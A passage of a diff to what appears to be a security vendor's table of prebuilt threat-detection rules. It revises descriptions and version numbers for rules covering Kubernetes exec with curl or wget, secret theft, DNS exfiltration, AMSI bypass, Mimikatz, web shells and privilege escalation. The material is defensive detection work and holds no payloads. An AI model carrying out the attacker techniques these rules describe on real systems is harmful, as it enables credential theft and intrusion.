reconstructs a readable command string from repeated command parameters, and applies **noise filters** for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Resources: Investigation Guide] |None |1 +|<> |Detects pod or attach exec API calls where the decoded request query implies curl or wget fetching an https URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies noise filters for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Resources: Investigation Guide] |None |2 |<> |This rule detects potential endpoint enumeration attempts by a single user and source IP address. By looking for a combination of failed/successful API requests across multiple endpoints and a limited number of documents, this rule can detect automated permission enumeration attempts. This behavior is uncommon for regular Kubernetes clusters. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |2 @@ -1762,13 +1768,13 @@ and their rule type is `machine_learning`. |<> |This rule detects when secrets are accessed via an unusual user agent, user name and source IP. Attackers may attempt to access secrets in a Kubernetes cluster to gain access to sensitive information after gaining access to the cluster. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 -|<> |Kubernetes audit identities for kubelet (`system:node:*`) and workloads (`system:serviceaccount:*`) are meant to operate with tight, predictable API usage. Direct `get` or `list` on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 +|<> |Kubernetes audit identities for kubelet (system:node:*) and workloads (system:serviceaccount:*) are meant to operate with tight, predictable API usage. Direct get or list on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 -|<> |Detects read access to Kubernetes Secrets (`get`/`list`) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 +|<> |Detects read access to Kubernetes Secrets (get/list) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Collection], [Resources: Investigation Guide] |None |2 +|<> |Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa with the actual caller identity in the impersonatedUser field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. This rule uses a 5-day new-terms history window keyed on the impersonated identity and alerts the first time that Azure AD principal performs this activity. |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Collection], [Resources: Investigation Guide] |None |3 -|<> |Detects list operations on Kubernetes Secrets from a non-loopback client when the request URI targets cluster-wide secrets or list operations under kube-system or default. Useful for spotting broad secret enumeration from remote clients. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Resources: Investigation Guide] |None |2 +|<> |Detects list operations on Kubernetes Secrets from a non-loopback client when the request URI targets cluster-wide secrets or list operations under kube-system or default. Useful for spotting broad secret enumeration from remote clients. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Resources: Investigation Guide] |None |3 |<> |This rule detects the creation or modification of sensitive Kubernetes configuration files on Linux systems. These files include Kubernetes manifests, PKI files, and configuration files that are critical for the operation of Kubernetes clusters. Monitoring these files helps identify potential unauthorized changes or misconfigurations that could lead to security vulnerabilities in Kubernetes environments. Attackers may attempt to modify these files to gain persistence or to deploy malicious containers within the Kubernetes cluster. |[Domain: Endpoint], [Domain: Kubernetes], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 @@ -1786,8 +1792,6 @@ and their rule type is `machine_learning`. |<> |This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs via an unusual user agent. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |211 -|<> |This rule detects unusual request responses in Kubernetes audit logs through the use of the "new_terms" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Container], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide] |None |6 - |<> |This rule detects a user attempt to establish a shell session into a pod using the 'exec' command. Using the 'exec' command in a pod allows a user to establish a temporary shell session and execute any process/commands in the pod. An adversary may call bash to gain a persistent interactive shell which will allow access to any data the pod has permissions to, including secrets. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide] |None |211 |<> |Flags Linux process executions whose arguments reference high-value Kubernetes service-account material, kubeconfig or node PKI paths, or common cloud files, when invoked via typical file-reading utilities or from ephemeral directories. Useful for spotting in-cluster and hybrid credential theft early. |[Data Source: Auditd Manager], [Data Source: Elastic Defend], [Domain: Endpoint], [Domain: Kubernetes], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 @@ -1808,7 +1812,7 @@ and their rule type is `machine_learning`. |<> |This rule monitors for the usage of the most common audio recording utilities on unix systems by an uncommon process parent. Adversaries may collect audio data from users or systems for a variety of reasons including espionage, credential theft, or reconnaissance. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |2 -|<> |This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |10 +|<> |This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |11 |<> |Detects applications making a curl request to a known public IP address lookup web service. Malware tends to perform this action to assess potential targets. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 @@ -2186,6 +2190,8 @@ and their rule type is `machine_learning`. |<> |This rule detects Suricata high severity alerts that are observed for the first time in the previous 5 days of alert history. Analysts can use this to prioritize triage and response. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Network], [Data Source: Suricata] |None |3 +|<> |This rule identifies outbound IPSEC NAT Traversal (NAT-T) traffic to an external destination IP that was not observed during the previous 5 days. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal encapsulates IPSEC ESP traffic in UDP and, once a NAT device is detected, both peers float to UDP port 4500 for the tunnel data channel. Newly observed external NAT-T peers may indicate unauthorized VPN use or an adversary tunneling command and control or exfiltration traffic over the Internet. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |113 + |<> |This rule detects Palo Alto Network alerts that are observed for the first time in the previous 5 days of alert history. Analysts can use this to prioritize triage and response. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Network], [Data Source: PAN-OS] |None |4 |<> |This rule alerts on processes exhibiting high CPU usage and that are observed for the first time in the previous 5 days. A previously unseen process consuming sustained CPU resources may indicate suspicious activity such as cryptomining, exploit payload execution, or other forms of resource abuse following host compromise. In some cases, this may also surface legitimate but unexpected software causing performance degradation. |[Use Case: Threat Detection], [Use Case: Observavility], [Resources: Investigation Guide], [Domain: Endpoint], [Tactic: Impact] |None |2 @@ -2314,7 +2320,7 @@ and their rule type is `machine_learning`. |<> |Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike] |None |419 -|<> |This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |112 +|<> |This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Rule Type: ESQL], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |113 |<> |Detects possible Denial of Service (DoS) attacks against an Okta organization. An adversary may attempt to disrupt an organization's business operations by performing a DoS attack against its Okta service. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact], [Resources: Investigation Guide] |None |414 @@ -2338,7 +2344,7 @@ and their rule type is `machine_learning`. |<> |Detects PowerShell scripts that reference Antimalware Scan Interface (AMSI) bypass classes, methods, or known bypass strings. Attackers attempt AMSI bypass to disable scanning and run malicious PowerShell content undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |118 -|<> |The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |319 +|<> |The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |320 |<> |Monitors for suspicious activities that may indicate theft or unauthorized duplication of machine learning (ML) models, such as unauthorized API calls, atypical access patterns, or large data transfers that are unusual during model interactions. |[Domain: LLM], [Data Source: Azure OpenAI], [Data Source: Azure Event Hubs], [Use Case: Model Theft], [Mitre Atlas: T0044], [Resources: Investigation Guide] |None |6 @@ -2362,7 +2368,7 @@ and their rule type is `machine_learning`. |<> |Identifies instances of Internet Explorer (iexplore.exe) being started via the Component Object Model (COM) making unusual network connections. Adversaries could abuse Internet Explorer via COM to avoid suspicious processes making network connections and bypass host-based firewall restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |111 -|<> |Identifies potential relay activities against a Computer account by identifying authentication events using the computer account coming from from hosts other than the server that owns the account. Attackers may relay the computer account hash after capturing it using forced authentication. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |112 +|<> |Identifies potential relay activities against a Computer account by identifying authentication events using the computer account coming from from hosts other than the server that owns the account. Attackers may relay the computer account hash after capturing it using forced authentication. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |113 |<> |Identifies the execution of a Chromium based browser with the debugging process argument, which may indicate an attempt to steal authentication cookies. An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Sysmon] |None |211 @@ -2392,6 +2398,10 @@ and their rule type is `machine_learning`. |<> |Identifies potential DNS exfiltration on Windows hosts by detecting a high volume of DNS queries whose subdomain labels follow a chunked encoding pattern (index-payload.base_domain). Attackers split stolen data across many DNS queries to evade volume-based detection; this rule aggregates queries per process, base domain, and five-minute window and flags sessions with many distinct chunk indices and sufficiently long encoded payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |1 +|<> |Identifies a client resolving the same public registered domain to both a public IP address and a private, loopback, link-local, unique-local IPv6, or shared address. This includes both address classes being observed at the same timestamp, and a public answer followed within five minutes by a private answer where the minimum TTL across all answer records in the private-answer events is 60 seconds or less. Either pattern is consistent with DNS rebinding that pivots browser or application trust to internal resources. |[Domain: Network], [Use Case: Threat Detection], [Use Case: Network Security Monitoring], [Tactic: Initial Access], [Rule Type: ESQL], [Data Source: Network Packet Capture], [Data Source: Network Traffic], [Data Source: Zeek], [Resources: Investigation Guide] |None |1 + +|<> |Identifies a client generating many unique, unusually long DNS query names to the same registered domain within a five-minute window. Malware DNS tunnels and DNS command-and-control commonly encode data in lengthy subdomain portions under one apex domain. |[Domain: Network], [Use Case: Threat Detection], [Use Case: Network Security Monitoring], [Rule Type: ESQL], [Tactic: Command and Control], [Tactic: Exfiltration], [Data Source: Network Packet Capture], [Data Source: Fortinet], [Data Source: Network Traffic], [Data Source: Zeek], [Resources: Investigation Guide] |None |1 + |<> |This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Sysmon], [Data Source: Crowdstrike] |None |317 |<> |A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |8 @@ -2438,6 +2448,8 @@ and their rule type is `machine_learning`. |<> |Detects when a scripting interpreter makes an outbound network connection to an Ethereum blockchain endpoint for command and control purposes. Adversaries may leverage Ethereum blockchain infrastructure as a covert C2 channel to receive commands and exfiltrate data, as observed in campaigns like SleepyDuck malware. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 +|<> |Identifies creation of a ":changelist" NTFS alternate data stream or a Windows service Args registry value pointing to a ":changelist" path. Microsoft Defender's Boot-Time Removal (BTR.sys) driver reads an RC4-encrypted transaction blob from a driver ADS named ":changelist", referenced by HKLM\SYSTEM\*ControlSet*\Services\*\Args. Adversaries can reproduce this staging outside Defender to abuse BTR.sys as a signed kernel primitive for arbitrary file and registry operations. This rule focuses on non-System writers and excludes Microsoft-signed MRT.exe running as SYSTEM, which may perform related remediation staging. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |2 + |<> |The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Microsoft Defender XDR], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne] |None |220 |<> |Identifies multiple Windows Filtering Platform block events and where the process name is related to an endpoint security software. Adversaries may add malicious WFP rules to prevent Endpoint security from sending telemetry. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |111 @@ -2476,13 +2488,15 @@ and their rule type is `machine_learning`. |<> |Identifies ICMP Echo traffic from an internal host to an external destination with a larger-than-typical transaction size. Covert channels and ICMP tunneling tools embed data in echo payloads that exceed normal OS ping behavior, which is usually limited to small fixed-size packets. |[Domain: Network], [Tactic: Command and Control], [Use Case: Threat Detection], [Use Case: Network Security Monitoring], [Data Source: Network Traffic], [Resources: Investigation Guide] |None |1 +|<> |Identifies the creation of ASPX/ASHX/ASMX files in specific directories that are commonly targeted by attackers to deploy web shells. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |5 + |<> |This rule detects potential impersonation attempts via the "kubectl" command in Linux environments. It identifies process events where "kubectl" is executed with arguments that suggest an attempt to impersonate another user or group, such as using "--kubeconfig", "--token", "--as", or "--as-group". This could indicate an adversary trying to gain unauthorized access or escalate privileges within a Kubernetes cluster. If this rule is triggered, in conjunction with rules related to secret access or kubeconfig file discovery, it may indicate a potential impersonation attempt. |[Domain: Endpoint], [Domain: Container], [Domain: Kubernetes], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |2 |<> |Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |16 |<> |Identifies PowerShell script block content containing Invoke-Mimikatz or Mimikatz commands used to dump credentials, extract password stores, export certificates, or use alternate authentication material. These patterns can indicate in-memory credential access and require reconstructed script context and follow-on telemetry to assess impact. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |216 -|<> |Identifies an outbound network connection by JAVA to LDAP, RMI or DNS standard ports followed by a suspicious JAVA child processes. This may indicate an attempt to exploit a JAVA/NDI (Java Naming and Directory Interface) injection vulnerability. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |108 +|<> |Identifies a Java process that accepts an inbound network connection and then spawns a suspicious child process. This may indicate exploitation of a Java service that runs attacker-controlled code, such as one that deserializes untrusted objects. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |109 |<> |Identifies use of Bifrost, a known macOS Kerberos pentesting tool, which can be used to dump cached Kerberos tickets or attempt unauthorized authentication techniques such as pass-the-ticket/hash and kerberoasting. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 @@ -2536,7 +2550,7 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: SentinelOne], [Data Source: Elastic Endgame] |None |13 -|<> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Resources: Investigation Guide] |None |111 +|<> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Resources: Investigation Guide] |None |112 |<> |Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |None |9 @@ -2630,7 +2644,7 @@ and their rule type is `machine_learning`. |<> |Identifies use of the Secure Copy Protocol (SCP) to copy files locally by abusing the auto addition of the Secure Shell Daemon (sshd) to the authorized application list for Full Disk Access. This may indicate attempts to bypass macOS privacy controls to access sensitive files. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |114 -|<> |Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |114 +|<> |Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |115 |<> |Identifies audit events for runc init child processes where the effective user is root and the login user ID is not root. This pattern can indicate privilege escalation or credential separation abuse inside container runtimes, where a process executes with elevated effective privileges while retaining a non-root audit identity. |[Domain: Endpoint], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Auditd Manager] |None |1 @@ -2652,7 +2666,7 @@ and their rule type is `machine_learning`. |<> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |10 -|<> |Detects potential privilege escalation under the root effective user when the real user and parent user are not root, indicative of the execution of binaries with SUID or SGID bits set. |[Data Source: Elastic Defend], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |2 +|<> |Detects potential privilege escalation under the root effective user when the real user and parent user are not root, indicative of the execution of binaries with SUID or SGID bits set. |[Data Source: Elastic Defend], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |3 |<> |Detects potential privilege escalation via SUID/SGID proxy execution on Linux systems. Attackers may exploit binaries with the SUID/SGID bit set to execute commands with elevated privileges. This rule identifies instances where a process is executed with root privileges (user ID 0 or group ID 0) while the real user or group ID is non-root, indicating potential misuse of SUID/SGID binaries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 @@ -2668,7 +2682,7 @@ and their rule type is `machine_learning`. |<> |Detects a short sequence where a non-root user performs unshare-related namespace activity (often associated with user namespace privilege escalation primitives) and then a root process is executed shortly after. This can indicate a successful local privilege escalation attempt or suspicious namespace manipulation captured in Auditd Manager telemetry. |[Data Source: Auditd Manager], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 -|<> |Identifies potentially suspicious use of unshare to create a user namespace context followed by a UID change event indicating a transition to root. Adversaries may use unshare-based primitives as part of local privilege escalation chains. This rule is intentionally generic and can surface multiple local privesc patterns beyond a single CVE. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |12 +|<> |Identifies potentially suspicious use of unshare to create a user namespace context followed by a UID change event indicating a transition to root. Adversaries may use unshare-based primitives as part of local privilege escalation chains. This rule is intentionally generic and can surface multiple local privesc patterns beyond a single CVE. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13 |<> |Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |216 @@ -2746,6 +2760,8 @@ and their rule type is `machine_learning`. |<> |Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Impact], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |314 +|<> |Identifies completed outbound 